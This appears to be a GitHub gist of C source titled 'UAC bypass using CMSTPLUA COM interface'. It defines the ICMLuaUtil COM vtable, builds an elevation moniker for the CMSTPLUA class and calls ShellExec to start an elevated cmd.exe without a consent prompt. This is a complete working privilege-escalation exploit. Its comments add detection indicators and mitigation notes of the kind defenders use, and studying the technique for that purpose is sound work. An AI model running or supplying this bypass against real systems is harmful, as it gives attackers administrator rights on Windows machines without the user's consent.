@api0cradle
Forked from hfiref0x/akagi_41.c
Created August 16, 2017 07:14
UAC bypass using CMSTPLUA COM interface
/* Forward declaration of the C-style COM interface used below. */
typedef interface ICMLuaUtil ICMLuaUtil;
/*
 * Hand-written vtable for ICMLuaUtil (C COM binding, no IDL-generated header).
 *
 * Only the slot order matters: this struct must match the interface's real
 * method layout slot for slot, or a call through it dispatches to the wrong
 * method. The first three slots are the IUnknown triple. Every other slot
 * except ShellExec carries a placeholder name (Method1..Method20); this page
 * does not document what those methods do, and none of them is called here.
 */
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
/* IUnknown slot 0. */
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
/* IUnknown slot 1. */
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in ICMLuaUtil * This);
/* IUnknown slot 2 — used by the caller to drop the proxy when done. */
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in ICMLuaUtil * This);
/* Slots 3..8: placeholders, purpose not documented here. */
HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in ICMLuaUtil * This);
/*
 * Slot 9: the one method this listing exercises. Its parameter list mirrors
 * a ShellExecute-style call (file, parameters, directory, mask, show flag);
 * the actual semantics live in the COM server, not on this page. Because the
 * server is reached through an elevation moniker (see Method41_Test), the
 * process it starts runs in the server's security context, not the caller's.
 */
HRESULT(STDMETHODCALLTYPE *ShellExec)(
__RPC__in ICMLuaUtil * This,
_In_ LPCTSTR lpFile,
_In_opt_ LPCTSTR lpParameters,
_In_opt_ LPCTSTR lpDirectory,
_In_ ULONG fMask,
_In_ ULONG nShow
);
/* Slots 10..22: placeholders, purpose not documented here. */
HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method12)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method13)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method14)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method15)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method16)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method17)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method18)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method19)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method20)(
__RPC__in ICMLuaUtil * This);
END_INTERFACE
} *PICMLuaUtilVtbl;
/*
 * Interface object: a single vtable pointer, as in any C-binding COM
 * interface. Calls are made as obj->lpVtbl->Method(obj, ...).
 */
interface ICMLuaUtil
{
CONST_VTBL struct ICMLuaUtilVtbl *lpVtbl;
};
/*
 * String forms of the class and interface identifiers, as wide literals.
 * The CLSID is both parsed into a CLSID and appended verbatim to the elevation
 * moniker below; the IID is only parsed. From a monitoring standpoint the CLSID
 * string is the stable indicator: it appears in the moniker passed to
 * CoGetObject and in the class registration of the COM server being activated.
 */
#define T_CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define T_IID_ICMLuaUtil L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"
/*
 * Method41_Test — activates the CMSTPLUA COM class through an
 * "Elevation:Administrator!new:" moniker and calls ShellExec on it.
 *
 * What the visible code establishes:
 *   - the moniker is built from a fixed prefix plus T_CLSID_CMSTPLUA;
 *   - activation uses CoGetObject with BIND_OPTS3 and CLSCTX_LOCAL_SERVER,
 *     i.e. an out-of-process server;
 *   - on success, ShellExec is invoked with a fixed cmd.exe path; the HRESULT
 *     it returns is stored in r but never inspected;
 *   - the function returns nothing and reports nothing; every failure path
 *     simply falls through to the Release at the end.
 *
 * Why this matters to a defender: the COM server is activated elevated by the
 * moniker, so the ShellExec call — and the process it starts — runs in the
 * server's context rather than the medium-integrity caller's. The durable
 * detection anchors are (a) a non-elevated process passing an
 * "Elevation:Administrator!new:{...}" moniker for this CLSID to CoGetObject
 * and (b) an unexpected child process whose parent is the elevated COM
 * surrogate hosting this class (confirm the host image name on the OS build
 * in question). Mitigation-wise, this relies on auto-elevation; UAC set to
 * "Always notify" forces a consent prompt for such activations, and it does
 * not apply to accounts that are not local administrators.
 */
VOID Method41_Test()
{
HRESULT r = E_FAIL;
BOOL bCond = FALSE; /* always FALSE: the do/while below runs once; `break` is the early exit */
IID xIID_ICMLuaUtil;
CLSID xCLSID_ICMLuaUtil;
ICMLuaUtil *CMLuaUtil = NULL;
BIND_OPTS3 bop;
WCHAR szElevationMoniker[MAX_PATH];
do {
/* NOERROR and S_OK are both 0; the two checks below are equivalent but written inconsistently. */
if (CLSIDFromString(T_CLSID_CMSTPLUA, &xCLSID_ICMLuaUtil) != NOERROR) {
break;
}
if (IIDFromString(T_IID_ICMLuaUtil, &xIID_ICMLuaUtil) != S_OK) {
break;
}
/*
 * Build "Elevation:Administrator!new:{CLSID}". Prefix (28 wide chars) plus the
 * 38-char CLSID string fits MAX_PATH with room to spare, so the unbounded
 * _strcpy/_strcat (presumably project wrappers, not CRT) are safe here.
 */
RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker));
_strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
_strcat(szElevationMoniker, T_CLSID_CMSTPLUA);
/* BIND_OPTS3 is zeroed so only cbStruct and the class context are set; local (out-of-proc) server. */
RtlSecureZeroMemory(&bop, sizeof(bop));
bop.cbStruct = sizeof(bop);
bop.dwClassContext = CLSCTX_LOCAL_SERVER;
/* The moniker, not the caller's token, determines the server's elevation. */
r = CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, &xIID_ICMLuaUtil, &CMLuaUtil);
if (r != S_OK) {
break;
}
/* Result is assigned to r but never checked; callers get no success/failure signal. */
r = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, L"C:\\windows\\system32\\cmd.exe", NULL, NULL, SEE_MASK_DEFAULT, SW_SHOW);
} while (bCond);
/* CMLuaUtil is only non-NULL if CoGetObject succeeded; drop the proxy reference. */
if (CMLuaUtil != NULL) {
CMLuaUtil->lpVtbl->Release(CMLuaUtil);
}
}